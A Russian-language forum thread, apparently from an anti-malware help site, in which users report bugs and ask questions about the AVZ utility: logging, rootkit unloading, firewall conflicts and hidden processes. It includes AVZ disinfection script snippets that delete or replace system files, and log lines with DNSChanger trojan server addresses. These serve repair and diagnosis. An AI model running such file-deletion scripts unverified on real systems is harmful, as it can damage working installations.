> А тогда какой смысл? Проще сказать пользователю "поищите файлы на диске с такими-то параметрами". Такие данные, на мой взгляд, как раз и должны быть только в общем логе исследования системы. Или в DSS и ComboFix это тоже запускается отдельно от основного исследования?


Смысл - не загружать основные логи, если потребуется, можно запросить, как дополнительный лог. Пользователю сказать можно "поищите...", вот только не все правильно ищут (даже то, что действительно существует, иногда найти не могут). Уж лучше сказать: "Выполните стандартный скрипт 7"  :Smiley: 
В DSS логи разделены на main.txt и extra.txt, в посл. лог, кроме чего прочего, входит  ещё секция "Add/Remove Programs", имхо, полезная часть лога.
Файлы+каталоги надо искать ещё в профиле пользователя, насчет периода... dss и combofix период берут больше (полмесяца, месяц), имхо, период скорее всего подобран опытным путем  :Smiley: 
И ещё, неплохо бы атрибуты файлов/папок видеть и их размеры.

----------


## Макcим

> Сканируя весь диск я конечно могу что-то найти, но если вдруг попадется юзер с диском на 2 терабайта, что тогда !? Его сканирование может занять в лучшем случае часы (а если у него неотключенный AV монитор - сутки).


Какова вероятность того, что попадется юзер с таким диском?

----------


## Зайцев Олег

> Ну в этой теме такой зоопарк, что может быть всё, что угодно.
> А вообще в OPF есть антируткит. И много разногопротиводействия выгрузке. А может быть сделать вариант стандартного скрипта без выгрузки OPF? То есть выгружать все руткиты, кроме известных FireWall и антивирусных ядер?


Так не выйдет - это уже когда-то обсуждалось, возможен каскадный перехват (руткит + легитимное поверх, или наоборот), или баг за счет частичного снятия перехвата.

----------


## ALEX(XX)

> Какова вероятность того, что попадется юзер с таким диском?


А ты годик подожди.. Уже народ покупает винты по 750Гб

----------


## Макcим

> А ты годик подожди.. Уже народ покупает винты по 750Гб


Убедил

----------


## Pili

> Поиск потенциально опасных файлов во временных директориях.


Кстати, может ещё очистку временных файлов визардом или скриптом сделать? )

----------


## Макcим

> файлы искать только в корне диска и системной папке


Тогда ещё и в кэше браузера.

----------


## Зайцев Олег

> Какова вероятность того, что попадется юзер с таким диском?


процент высок (мне тестироваться придется на виртуалке - у меня диски по 750 стоит). Причем что интересно - такие диски начинают ставить в юзеровские ПК. Нечасто, но уже ставят ... и они быстро дешевеют

*Добавлено через 1 минуту*




> Тогда ещё и в кэше браузера.


А кеш зачем ? там обычно страшная помойка, тем более кеш может быть скажем размером 1-2 ГБ ... и все это попадет в лог

*Добавлено через 32 секунды*




> Кстати, может ещё очистку временных файлов визардом или скриптом сделать? )


Легко, прототип уже есть ...

----------


## Макcим

> А кеш зачем ? там обычно страшная помойка, тем более кеш может быть скажем размером 1-2 ГБ ... и все это попадет в лог.


Вот сколько у Вас на работе ПК, доступных для исследований? Проведите эксперимент, скажите сколько найдется в кэше браузера на каждом компе безопасных *.exe файлов?

----------


## Зайцев Олег

> Вот сколько у Вас на работе ПК, доступных для исследований? Проведите эксперимент, скажите сколько найдется в кэше браузера на каждом компе безопасных *.exe файлов?


Гигов 100 найдется ... там будет туча мусора - разные закачанные легитимные программы, битые - недокачанные файлы и т.п. У меня есть идея другого сорта - попробовать просканировать базу кеша и вынуть оттуда подозрительные URL, которые недавно загружались

----------


## Макcим

> Гигов 100 найдется ... там будет туча мусора - разные закачанные легитимные программы, битые - недокачанные файлы и т.п.


Я наивно полагал, что кэш и закачанные файлы хранятся в разных папках. Нет?

----------


## Jef239

> Я наивно полагал, что кэш и закачанные файлы хранятся в разных папках. Нет?


Не всегда.

----------


## Зайцев Олег

> Я наивно полагал, что кэш и закачанные файлы хранятся в разных папках. Нет?


Нет, это не так. Я к примеру сохраняю штатным образом (из IE) некий файл из Инет ... он сначала сохраняется в кеш, а затем - переписывается куда сказано. При этом в кеше копия чаще всего остается - на случай, если я еще раз обращусь к этому ресурсу. При написании разных обновлялок/загружалок это бывает проблемой - на стороне WEB сервера приходится указывать в заголовке ответа, что файл не кешировать ... и в API это указывать. Причем еще момент - у альтернативных бразуров/качалок могут быть свои кеши, которы они ведут по собственным алгоритмам ...

----------


## Макcим

Тогда действительно проблем больше.

----------


## LoMo

Зайцев Олег 
Такой вопрос... тоесть Agnitum Outpost Firewall PRO (32-bit) 6.0 не даёт нормально AVZ работать и что бы нормально проходило сканирование - лечение надо сносить Agnitum Outpost Firewall PRO (32-bit) 6.0 и переходить на версию ниже 6.0? или это не влияет на эффект лечение - сканирование?
Заранее спасиб

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Jef239

В поиске Cookies не работает кнопка "Сохранить протокол". То есть вообще никаких действий не вызывает.

*Добавлено через 5 минут*




> Зайцев Олег 
> Такой вопрос... тоесть Agnitum Outpost Firewall PRO (32-bit) 6.0 не даёт нормально AVZ работать и что бы нормально проходило сканирование - лечение надо сносить Agnitum Outpost Firewall PRO (32-bit) 6.0 и переходить на версию ниже 6.0? или это не влияет на эффект лечение - сканирование?
> Заранее спасиб


Я бы сказал так - если ты подозреваешь, что у тебя руткиты - для начала отсоединись от инета и снеси всё руткитоподобное (антивирусные ядра, брандамауэры и защиты игрушек).

Брандмауэр не даёт его отключить ни зловредам ни AVZ. И это вообще-то правильно. Равно как и хорошее антивирусное ядро не должно позволять AVZ его снимать.
На мой взгляд выход - убрать из стандартного скрипта безусловное снятие руткитов и заменить его на условное, чтобы пользователь мог попробовать и так  и так.

----------


## psw

Вопрос по мастеру поиска и исправления проблем.
Исправление пункта
>> Безопасность: разрешен административный доступ к локальным дискам (C$, D$ ...)
сводится к установлению параметра
AutoShareWks в 0
(HKLM\SYSTEM\CurrentControlSet\Services\lanmanserv  er\parameters)
При этом, конечно, шары C$ etc. убиваются, но убиваются все шары вообще и,
что для пользователя может оказаться неожиданным, исчезает вкладка Sharing как класс. Т.е. пользователь при этом новую шару (неадминистративную) сделать просто не может.
Вопрос: а) насколько правильно такое поведение; б) не лучше ли было после убития административных шар вернуть значение параметра в прежнее значение
(если руками поставить 1, то вкладка появится, но об этом пользователь должен знать).

----------


## Зайцев Олег

> Вопрос по мастеру поиска и исправления проблем.
> Исправление пункта
> >> Безопасность: разрешен административный доступ к локальным дискам (C$, D$ ...)
> сводится к установлению параметра
> AutoShareWks в 0
> (HKLM\SYSTEM\CurrentControlSet\Services\lanmanserv  er\parameters)
> При этом, конечно, шары C$ etc. убиваются, но убиваются все шары вообще и,
> что для пользователя может оказаться неожиданным, исчезает вкладка Sharing как класс. Т.е. пользователь при этом новую шару (неадминистративную) сделать просто не может.
> Вопрос: а) насколько правильно такое поведение; б) не лучше ли было после убития административных шар вернуть значение параметра в прежнее значение
> (если руками поставить 1, то вкладка появится, но об этом пользователь должен знать).


Поведение в принципе правильное, в визарде есть такая фича - отмена изменений. С ее помощью в случае чего можно отменить сделанные изменения

----------


## zerocorporated

У avz есть команды GetComputerName и т.д. возвращающие какое либо значение. Может стоить добавить к ним команды для получения текущей даты и времени? Просто если отчеты будут складываются на сервере просто с названием машины - удобно бы чтоб они например сортировались по папкам(По дате) и внутри содержали время сканирования прям в имени файла.

----------


## Muffler

> У avz есть команды GetComputerName и т.д. возвращающие какое либо значение. Может стоить добавить к ним команды для получения текущей даты и времени? Просто если отчеты будут складываются на сервере просто с названием машины - удобно бы чтоб они например сортировались по папкам(По дате) и внутри содержали время сканирования прям в имени файла.




```
FormatDateTime('hhnn_ddmmyyyy',Now);
```

----------


## Гость форума

.......................................
6. Поиск открытых портов TCP/UDP, используемых вредоносными программами
 Проверка отключена пользователем
.......................................
подскажите пожалуста что это значит?
я ничево не отключал
и ещё при запуске avzguard у меня блокируется ехе файлы
пишет у вас нет прав доступа

----------


## Гость форума

> 6. Поиск открытых портов TCP/UDP, используемых вредоносными программами
>  Проверка отключена пользователем
> подскажите пожалуста что это значит?
> я ничево не отключал


Для ясности правильнее было бы сказать *не включена* пользователем.




> и ещё при запуске avzguard у меня блокируется ехе файлы
> пишет у вас нет прав доступа


Читаем справку AVZ - так было задумано.

----------


## Гость форума

спасибо.
а где это включить?

----------


## rubin

Вкладка "Параметры поиска" в главном окне AVZ

----------


## rubin

http://virusinfo.info/showthread.php?t=16297

AVZ не видит C:\WINNT\system32\hg543fdg.dll

----------


## Макcим

*DelAutorunByFileName* не работает!!!

----------


## psw

Сегодня попробовал выполнить на работе стандартный скрипт 2. Видно было процесс сканирования на экране, который доходил до конца, но после этого (по видимому в момент создания самого отчета, процент выполненной работы при этом был от 85 до 95 процентов) выскакивало окошко AVZ &quot;Invalid variant type&quot;. Эффект был устойчивый. Никакого архива при этом не создавалось.
Проверка Cureit!/AVZ/HJT никаких вирусных проблем не выявила.
AVZ 4.29, операционная система Win2kSP4en (по-видимому, без последующих апдейтов).
Что бы это могло значить?  P.S. На домашней Win2kSP4 то же самое. Снимок окна прилагается.

----------


## patq

Установил avz 4.29. Захотел почитать справку. Она открылась в  Help Workshop. Посмотрел  файл справки он представлен в формате avz.cnt.
 Пожалуйста, посоветуйте как его перевести в  avz.hlp

----------


## borka

> Пожалуйста, посоветуйте как его перевести в  avz.hlp


Может, я чего-то не понял, но файл avz.hlp лежит рядом с экзешником...

----------


## Макcим

Кроме того есть on line справка http://z-oleg.com/secur/avz_doc/

----------


## Зайцев Олег

> Сегодня попробовал выполнить на работе стандартный скрипт 2. Видно было процесс сканирования на экране, который доходил до конца, но после этого (по видимому в момент создания самого отчета, процент выполненной работы при этом был от 85 до 95 процентов) выскакивало окошко AVZ &quot;Invalid variant type&quot;. Эффект был устойчивый. Никакого архива при этом не создавалось.
> Проверка Cureit!/AVZ/HJT никаких вирусных проблем не выявила.
> AVZ 4.29, операционная система Win2kSP4en (по-видимому, без последующих апдейтов).
> Что бы это могло значить? P.S. На домашней Win2kSP4 то же самое. Снимок окна прилагается.


Стоит обновить базы и проверить еще раз - баг отловлен, код в базах скорректирован.

*Добавлено через 55 секунд*




> *DelAutorunByFileName* не работает!!!


Как не работает ?

----------


## XL

Олег, а можно рассказать, в каких случаях AVZ выдает алерт в логе о том, что обнаружена защита от антируткитов? Сегодня попалась одна такая машина, пришлось убить 3 часа своего времени на ее полное излечение в итоге.
Это не тот случай, когда трояном патчится ntoskrnl.exe?

----------


## Зайцев Олег

> Олег, а можно рассказать, в каких случаях AVZ выдает алерт в логе о том, что обнаружена защита от антируткитов? Сегодня попалась одна такая машина, пришлось убить 3 часа своего времени на ее полное излечение в итоге.
> Это не тот случай, когда трояном патчится ntoskrnl.exe?


AVZ в основном ругается на защиту в том случае, если зловред блокирует доступ к ntoskrnl.exe, это делается для того, чтобы антируткит не мог сравнить имеющийся на диске ntoskrnl и то, что есть в памяти

----------


## drol

Олег, я человек не сведущий в антивирусных отчетах. Подскажите, что значит «Прямое чтение C:\Documents and Settings\Олег\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\index.dat” С уважением.

----------


## pig

Прямое чтение - это чтение в обход файловой системы. Непосредственно с диска на физическом уровне. Применяется тогда, когда система не пускает читать файл обычным образом.

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## zerocorporated

> Олег, я человек не сведущий в антивирусных отчетах. Подскажите, что значит «Прямое чтение C:\Documents and Settings\Олег\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\Content.IE5\index.dat” С уважением.


Прямое чтение означает, что обычным способом считать данные не удалось (использовались чем-то) и AVZ применяет "Прямое чтение".
Основано оно на том, что AVZ получает список кластеров где расположена информация и пытается считать информацию с этих кластеров.

Упс... ответечали уже.

----------


## Макcим

> Как не работает ?


Просто не работает. Применял в нескольких темах для зачистки мусора. Связка SysCleanAddFile + ExecuteSysClean справилась.

----------


## patq

> Может, я чего-то не понял, но файл avz.hlp лежит рядом с экзешником...


Еще раз посмотрел архив. Лежит там родненький, вместе с avz.cnt. 
Выходит незаметно для себя avz.hlp затер. 
Спасибо за помощь

----------


## rubin

Нельзя ли, чтобы AVZ как-то выводил следующие строки в логах?

http://virusinfo.info/showthread.php?t=16621



```
O17 - HKLM\System\CCS\Services\Tcpip\..\{150DB5AC-1F8A-4229-8630-0D0F9EB5F992}: NameServer = 85.255.115.101,85.255.112.68
O17 - HKLM\System\CCS\Services\Tcpip\..\{2D640CCF-615A-4753-ADBB-634355DEEC8D}: NameServer = 85.255.115.101,85.255.112.68
O17 - HKLM\System\CCS\Services\Tcpip\..\{5DE5C1B6-A6CC-49A7-83AE-CA0AB863D00E}: NameServer = 85.255.115.101,85.255.112.68
O17 - HKLM\System\CCS\Services\Tcpip\..\{FD25A1B6-029A-4888-8BB7-686C2896D834}: NameServer = 85.255.115.101,85.255.112.68
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: NameServer = 85.255.115.101 85.255.112.68
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: NameServer = 85.255.115.101 85.255.112.68
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 85.255.115.101 85.255.112.68
```

А то пользователь сразу сказал, что серверы не его... начали искать - Trojan.DNSChanger - как и ожидалось

----------


## Jef239

Вызываю "Исследование системы". Запускаю. По окончании спрашивает "Показать протокол". Отвечаю YES и.... ничего не показывается. Сам протокол на диске есть, ассоциация на HTM живая и назначена на IE.
Баг?!

----------


## Макcим

У меня так же  :Sad:

----------


## Bratez

Угу. Если браузер по умолчанию - не IE, то не открывает. Приходися через контекстное меню, либо Файл-Открыть...

----------


## rubin

У меня вопрос возник, может подскажет кто.
Работают ли такие комбинации:


```
DeleteFileMask('папка', 'файлмаска', false);
BC_ImportDeletedList
```

Т.е. все удаляемые файлы будут импортировать в BC? И удаляться при загрузке, если по хорошему не вышло? 
И второй:


```
DeleteFileMask('папка', 'файлмаска', false);
ExecuteSysClean
```

Будет ли проводиться чистка удаляемых файлов?

----------


## Зайцев Олег

> У меня вопрос возник, может подскажет кто.
> Работают ли такие комбинации:
> 
> 
> ```
> DeleteFileMask('папка', 'файлмаска', false);
> BC_ImportDeletedList
> ```
> 
> ...


Да, в теории должно работать. DeleteFileMask по сути цикл поиска файлов по заданным условим + вызов DeleteFile для всех найденных

*Добавлено через 2 минуты*




> Нельзя ли, чтобы AVZ как-то выводил следующие строки в логах?
> 
> http://virusinfo.info/showthread.php?t=16621
> 
> 
> 
> ```
> O17 - HKLM\System\CCS\Services\Tcpip\..\{150DB5AC-1F8A-4229-8630-0D0F9EB5F992}: NameServer = 85.255.115.101,85.255.112.68
> O17 - HKLM\System\CCS\Services\Tcpip\..\{2D640CCF-615A-4753-ADBB-634355DEEC8D}: NameServer = 85.255.115.101,85.255.112.68
> ...


Нельзя - многие пользователи считают такие настройки конфиденциальными (в корпоративной среде как может и быть), и "засветка" в логах адресов DNS, прокси, прочих настроек начиная с IP адреса и т.п. часто воспринимается весьма отрицательно.

----------


## Geser

> Нельзя - многие пользователи считают такие настройки конфиденциальными (в корпоративной среде как может и быть), и "засветка" в логах адресов DNS, прокси, прочих настроек начиная с IP адреса и т.п. часто воспринимается весьма отрицательно.


Ну так выводить хоть первые два числа адреса, а вместо остальных звездочки

----------


## Geser

Попросил меня сотрудник убрать из автозапуска ISUSPM.exe
В менеджере автозапуска я её не обнаружил. Цепляю дамп реестра. Вопрос почему эта программа не видна в менеджере автозапуска?

----------


## Jef239

> Попросил меня сотрудник убрать из автозапуска ISUSPM.exe
> В менеджере автозапуска я её не обнаружил. Цепляю дамп реестра. Вопрос почему эта программа не видна в менеджере автозапуска?


Это Win2k? Там вроде есть особенность - запуск идёт и из подпапок ключа Run.

*Добавлено через 6 минут*

Тьфу, посмотрел. В тваоих данных не видно, откуда она запускается. То есть это OLE-сервер. А какая програма его запускает - непонятно. Поищи по рестру 5C68BFD9-83A2-4DB9-983E-A2BC5E876E56 и 76826D50-F6EB-43A0-BC6D-4F43479CA75B
Если найдёшь - повезло.
Но похоже, что это часть InstallShield и запускает его какой-то стартер от InstallShield. Гм, не проще ли в самом InstallShield в меню порыться и отключить автоматическое обновление?

----------


## Bratez

В некоторых случаях некорректно отображаются BHO.
Например тут: http://virusinfo.info/showpost.php?p=177332&postcount=8

В логе HijackThis:


```
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
```

а в логе AVZ - пустышка, т.е. выведен только CLSID, а файла и описания нет. Если файл в базе безопасных, то этой строки в логе совсем не должно быть.

----------


## Sergiy

чем отличаются параметры командной строки NW и NQ?
В описаниях параметров есть только описание параметра NQ. А в примерах (например "Заготовка скрипта для сканирования сети") есть параметр NW:
\\my_server\AVZ\avz.exe Priority=-1 nw=Y nq=Y HiddenMode=2 Script=\\my_server\AVZ\netscan.avz
и в описании примера дается описание параметра NW, идентичное параметру NQ. 
Зачем тогда два этих параметрв в командой строке?

----------


## Geser

Сегодня делал автокарантин.
Получил следующие ошибки:


```
Ошибка карантина файла, попытка прямого чтения (rundll32.exe C:\WINDOWS\system32\shimgvw.dll,ImageView_COMServer {00E7B358-F65B-4dcf-83DF-CD026B94BFD4})
Ошибка карантина файла, попытка прямого чтения (mscoree.dll)
```

----------


## zerocorporated

При выполнении такого скрипта:


```
begin
 RunScan;
 ExecuteStdScr(3);
end.
```

Наблюдается наползания кнопки "Пуск" на кнопку "Прервать работу скрипта"

----------


## rubin

При карантине файлов, опознанных AVZ как безопасные, они естественно в карантин не попадают, но ini-файл так же создается. Нельзя в такой файлик вносить пометку - "safe" или нечто подобное? Чтобы не гадать, просто не закарантинилось или AVZ опознал...

----------


## Иван Шацкий

Заранее извиняюсь, если пишу не туда, куда надо, если что - ткните носом, куда можно подобные вопросы задавать.

Вопрос первый. Имеется система (W2K Pro), в которой точно что-то сидит, потому как при выходе в интернет (dial-up'ном) процесс System открывает кучу соединений. Ни один из инструментов AVZ ничего подозрительного не показывает. Загрузка процессора скачет от 0 до 100 процентов и обратно, процессорное время занимает все тот же System. Можно ли как-то узнать, кто виноват? Что может дать в этом случае расчет MD5, проверяются ли эти контрольные суммы по базе безопасных файлов? Есть ли способ проверить цифровую подпись системного файла Windows? Или это не имеет смысла, за изменением системных файлов следит SFC?

Вопрос второй. Есть ли в AVZ возможность выполнить сканирование диска на предмет наличия файлов с альтернативными data streams?

Вопрос третий. Даже при включенном драйвере AVZPM мне попадались системы, где в списке модулей пространства ядра присутствовали непонятные драйвера с абракадаброй вместо имени (ну и файла такого тоже на диске не было, естественно). При каких обстоятельствах такое может быть возможно?

Лог-файлы в данную минуту прицепить не могу, до интересующей меня системы не добраться. Но если без них никак - обязательно сделаю. Если где-то здесь есть раздел, где отвечают на вопросы по AVZ - отправьте туда (сходу не нашел).

Заранее спасибо.

----------


## Зайцев Олег

> Заранее извиняюсь, если пишу не туда, куда надо, если что - ткните носом, куда можно подобные вопросы задавать.
> 
> Вопрос первый. Имеется система (W2K Pro), в которой точно что-то сидит, потому как при выходе в интернет (dial-up'ном) процесс System открывает кучу соединений. Ни один из инструментов AVZ ничего подозрительного не показывает. Загрузка процессора скачет от 0 до 100 процентов и обратно, процессорное время занимает все тот же System. Можно ли как-то узнать, кто виноват? Что может дать в этом случае расчет MD5, проверяются ли эти контрольные суммы по базе безопасных файлов? Есть ли способ проверить цифровую подпись системного файла Windows? Или это не имеет смысла, за изменением системных файлов следит SFC?
> 
> Вопрос второй. Есть ли в AVZ возможность выполнить сканирование диска на предмет наличия файлов с альтернативными data streams?
> 
> Вопрос третий. Даже при включенном драйвере AVZPM мне попадались системы, где в списке модулей пространства ядра присутствовали непонятные драйвера с абракадаброй вместо имени (ну и файла такого тоже на диске не было, естественно). При каких обстоятельствах такое может быть возможно?
> 
> Лог-файлы в данную минуту прицепить не могу, до интересующей меня системы не добраться. Но если без них никак - обязательно сделаю. Если где-то здесь есть раздел, где отвечают на вопросы по AVZ - отправьте туда (сходу не нашел).
> ...


Если Firewall отсутствует, то при соединении с Инет может происходить что угодно, например ПК может атаковываться из сети эксплоитами. 
MD5 даются для справки, чтобы идентифицировать файл. AVZ плюс к этому проверяет файлы по базе ЭЦП MS и собственной базе чистых. Вручную эта проверка запускается из меню для указанного файла.
AVZ проверяет ADS, если включена максимальная эвристичка и расширенная проверка, то найдя ADS содержащий исполняемый файл он выдает сообщение в логе. 
AVZPM может регистрировать драйвера от CD эмуляторов и тп, нужно разбираться конкретно

----------


## Иван Шацкий

> Если Firewall отсутствует, то при соединении с Инет может происходить что угодно, например ПК может атаковываться из сети эксплоитами.


В данном случае причина точно внутри компьютера. Может ли какой-то Firewall помочь определить, какой из модулей пространства ядра инициирует соединения?




> MD5 даются для справки, чтобы идентифицировать файл. AVZ плюс к этому проверяет файлы по базе ЭЦП MS и собственной базе чистых. Вручную эта проверка запускается из меню для указанного файла.


Может быть, я не очень понятно спросил, попробую еще раз: AVZ хранит в собственной базе чистых файлов MD5? Рассчет MD5 может помочь мне найти модифицированный системный файл?




> AVZ проверяет ADS, если включена максимальная эвристичка и расширенная проверка, то найдя ADS содержащий исполняемый файл он выдает сообщение в логе.


А возможно ли (теоретически) написать для этого (для поиска ADS) скрипт?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Макcим

Ваши проблемы можно решить невероятно просто. Достаточно выполнить правила оформления запроса.

----------


## Иван Шацкий

Хотелось разобраться самому, честно говоря. Ситуация усугубляется тем, что в ближайшее время логи с интересующего меня компьютера я получить не могу. Может, есть более подходящий топик, где можно задавать вопросы на тему методик диагностирования и возможностей AVZ?

----------


## Макcим

> Хотелось разобраться самому, честно говоря.


Можем разобраться вместе, мне тоже интересно  :Smiley: 



> Может, есть более подходящий топик, где можно задавать вопросы на тему методик диагностирования и возможностей AVZ?


Нету, но Вы можете это исправить.

----------


## Зайцев Олег

> В данном случае причина точно внутри компьютера. 1. Может ли какой-то Firewall помочь определить, какой из модулей пространства ядра инициирует соединения?
> 
> 2. Может быть, я не очень понятно спросил, попробую еще раз: AVZ хранит в собственной базе чистых файлов MD5? Рассчет MD5 может помочь мне найти модифицированный системный файл?
> 
> 3.А возможно ли (теоретически) написать для этого (для поиска ADS) скрипт?


1. Не нужно этого делать. Нужно оградить ПК от атак извне, это любой Firewall сделает без проблем - отфильтрует и покажет в логе, кто и откуда ломится. Хотя это обычно не интересно - правила FW должны отсекать любую активность кроме той, что мы считаем полезной.
2. AVZ не хранит MD5 в своих базах - у него свои аглоритмы вичисления контрольной суммы, но суть от этого не меняется - изучаемый файл проверяется по базе безопасных, при этом используется контрольная сумма всего файла.
3. Нет. Скриптовой язык AVZ позволяет искать файлы, но для поиска ADS у файла или папки там команд нет

----------


## Иван Шацкий

> Можем разобраться вместе, мне тоже интересно


Ладно, убедили, соберу логи по описанной схеме, открою тему в разделе "помогите".

Всем спасибо за ответы.

----------


## Surfer

> Вопрос третий. Даже при включенном драйвере AVZPM мне попадались системы, где в списке модулей пространства ядра присутствовали непонятные драйвера с абракадаброй вместо имени (ну и файла такого тоже на диске не было, естественно). При каких обстоятельствах такое может быть возможно?


Возможно, если стоит alcohol, daemon tools, blind write или подобное.

----------


## Geser

Олег, а можно все же какие-то комментарии по постам 272,276?

----------


## Иван Шацкий

> Возможно, если стоит alcohol, daemon tools, blind write или подобное.


Daemon Tools стоит, верно...

А с чем связано, не подскажете заради расширения кругозора? Можно попробовать угадать? Потому что и AVZPM, и sptd.sys - драйвера группы "Boot Bus Extender", и второй может загрузиться раньше первого? И для гарантированного отсутствия замаскированных модулей уровня ядра надо, чтобы в системе не было ни одного "левого" драйвера из этой группы? Или глупость сказал?

----------


## Зайцев Олег

> Попросил меня сотрудник убрать из автозапуска ISUSPM.exe
> В менеджере автозапуска я её не обнаружил. Цепляю дамп реестра. Вопрос почему эта программа не видна в менеджере автозапуска?


AVZ не показывает в менеджере OLE классы - т.е. если нечто зарегистрировано как класс и не значится как BHO или расширение IE, то оно не найдется. Это один из вариантов

*Добавлено через 2 минуты*




> Сегодня делал автокарантин.
> Получил следующие ошибки:
> 
> 
> ```
> Ошибка карантина файла, попытка прямого чтения (rundll32.exe C:\WINDOWS\system32\shimgvw.dll,ImageView_COMServer {00E7B358-F65B-4dcf-83DF-CD026B94BFD4})
> Ошибка карантина файла, попытка прямого чтения (mscoree.dll)
> ```


Это нормально. В пеорвом случае rundll32.exe в начале, во втором - имя без пути. В случае ручного карантина идет поиск файла, в случае автокарантина поиск тоже идет, но в сокращеном виде. я проверю первый вариант - rundll32.exe в теории делжен отсекаться корректно

----------


## Geser

> AVZ не показывает в менеджере OLE классы - т.е. если нечто зарегистрировано как класс и не значится как BHO или расширение IE, то оно не найдется. Это один из вариантов


Факт в том что эта программа запускалась при старте Винды. Т.е. это способ автозапуска который АВЗ не контролирует. Т.е. дыра.

----------


## Karlson

Вопрос: можно ли сделать, что бы логи сохранялись так же как карантин - в папках по датам, а не перезаписывались поверх старых. ИМХО удобнее мониторить изменения, пока ревизор не работает..

----------


## Bugnet

*Олег*

Вот начало проблемы http://virusinfo.info/showthread.php?t=16953
После того, как я по доверчивости и наивности без бэкапа системстейта (сам виноват  :Smiley:  ) выполнил предлагаемые скрипты, ситуацию это только усугубило. Выполнение скритов из бэкапа AVZ обратно всё не вернуло. Снёс всё и поставил ось (*WinServer2003*) заново. Запустил AVZ с драйвером расширенного мониторинга процессов и без него - всё чисто. Накатываю *SP2*. Запускаю AVZ без драйвера - норма. Загружаю драйвер ... и опять вижу такие же сообщения

*>> обнаружена подмена PID (текущий PID=0, реальный = 32Маскировка процесса с PID=1280, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1280)Маскировка процесса с PID=1624, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1624)Маскировка процесса с PID=1812, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1812)Маскировка процесса с PID=1884, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 1884)Маскировка процесса с PID=2040, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 2040)Маскировка процесса с PID=268, имя = ""
>> обнаружена подмена PID (текущий PID=0, реальный = 26 
Поиск маскировки процессов и драйверов завершен*

Что это? 

И ещё вопрос. На этом же компе через локальные групповые политики убираю автозапуск всего, в том числе и CDRom-а. Проверяю - автозапуск не работает. А AVZ меня продолжает предупреждать, что автозапуск с CDRom-а открыт. Кто неправ?

Спасибо.

----------


## Зайцев Олег

> *Олег*
> 
> Вот начало проблемы http://virusinfo.info/showthread.php?t=16953
> После того, как я по доверчивости и наивности без бэкапа системстейта (сам виноват  ) выполнил предлагаемые скрипты, ситуацию это только усугубило. 
> Что это? 
> .....
> И ещё вопрос. На этом же компе через локальные групповые политики убираю автозапуск всего, в том числе и CDRom-а. Проверяю - автозапуск не работает. А AVZ меня продолжает предупреждать, что автозапуск с CDRom-а открыт. Кто неправ?
> 
> Спасибо.


Нельзя так баловаться с сервером ... в указанной теме кто-то сообщил хелперам о том, что это сервер ? Я не заметил ... Естественно, что удаление политик на сервере с активным IPSec приведет к отключению Инет, в этом нет ничего удивительного.
AVZ проверяет глобальный флаг автозапуска с CDRom, потому он и сообщает о том, что автозагрузка возможна.

----------


## Bugnet

> ... в указанной теме кто-то сообщил хелперам о том, что это сервер ? Я не заметил ...


Так я ж без всяких то претензий.  :Smiley: 
(Но в каждом из логов есть строка об оси и сервис паках.  :Wink: 
Но любой мог и не заметить).

Так а что с маскировкой процессов?
Это нормально для Win2k3 c SP2 или это мой уникальный случай?

Спасибо.

----------


## Зайцев Олег

> Так я ж без всяких то претензий. 
> (Но в каждом из логов есть строка об оси и сервис паках. 
> Но любой мог и не заметить).
> 
> Так а что с маскировкой процессов?
> Это нормально для Win2k3 c SP2 или это мой уникальный случай?
> 
> Спасибо.


Да причем тут претензии - просто перед *любым* шаманством с серверной осью крайне желательно забекапить ее целиком (скажем акронисом или чем-то подобным, бекап всего системного раздела). Иначе легко дойти до format c:  :Smiley:  А хелперам лучше сообщать в явном виде, что это сервер - версию в логе легко и не заметить ... а для сервера многие вещи опасны, например удаление политик для сервака чревато (скрипт номер 6 AVZ), а вот для обычной операционки безопасно.
По поводу маскировки - на сервере такое часто бывает, это не опасно. Просто там есть фоновая активность, скажем процесс X может запуститься и завершиться, а в ходе скана это будет воспринять как маскировка. Чаще всего такое проявляется на Win2k3, причем далеко не всегда - например, на моих серверах с Win2k3 такого эффекта не наблюдается.

----------


## santy

Олег, есть ли возможность с помощью АВЗ при перезагрузке заменить зараженный системный файл на чистую копию? (человек мне говорил, что не мог вылечить его сканерами в безопасном режиме. подменил на чистый, загрузившись с лайф-диска.)

----------


## rubin

```
begin
// Переименовываем зараженный файл
RenameFile('root\file.exe', 'root\file.bak');
// Копируем из указанного места здоровый файл
CopyFile('root\clean\file.exe', 'root\file.exe');
// Удаляем зараженный
BC_DeleteFile('%windir%\system32\file.bak');
BC_Activate;
RebootWindows(true);
end.
```

Не пойдет?

----------


## mgulg

Здравствуйте! Такая беда. После скана дисков программой AVZ перестали читаться R и RW диски (самописные, не "фабричные", так как "фабричные" читаются), которые раньше читались нормально. Такая же история на другом компе. Как быть?

----------


## Karlson

> Вопрос: можно ли сделать, что бы логи сохранялись так же как карантин - в папках по датам, а не перезаписывались поверх старых. ИМХО удобнее мониторить изменения, пока ревизор не работает..


или может приписывать к папке номер (имя ПК).. а то если обходишь компы с флешкой или с сетевого диска зпускаешь, логи перезаписываются...

----------


## zmv

Не получается обновить базу. Ошибка: "Ошибка во время загрузки файла с описанием обновления avzupd.zip - файл поврежден".
Пробовала выполнить 5ый скрипт, ответ: "Автоматическое обновление завешено с ошибками"

----------

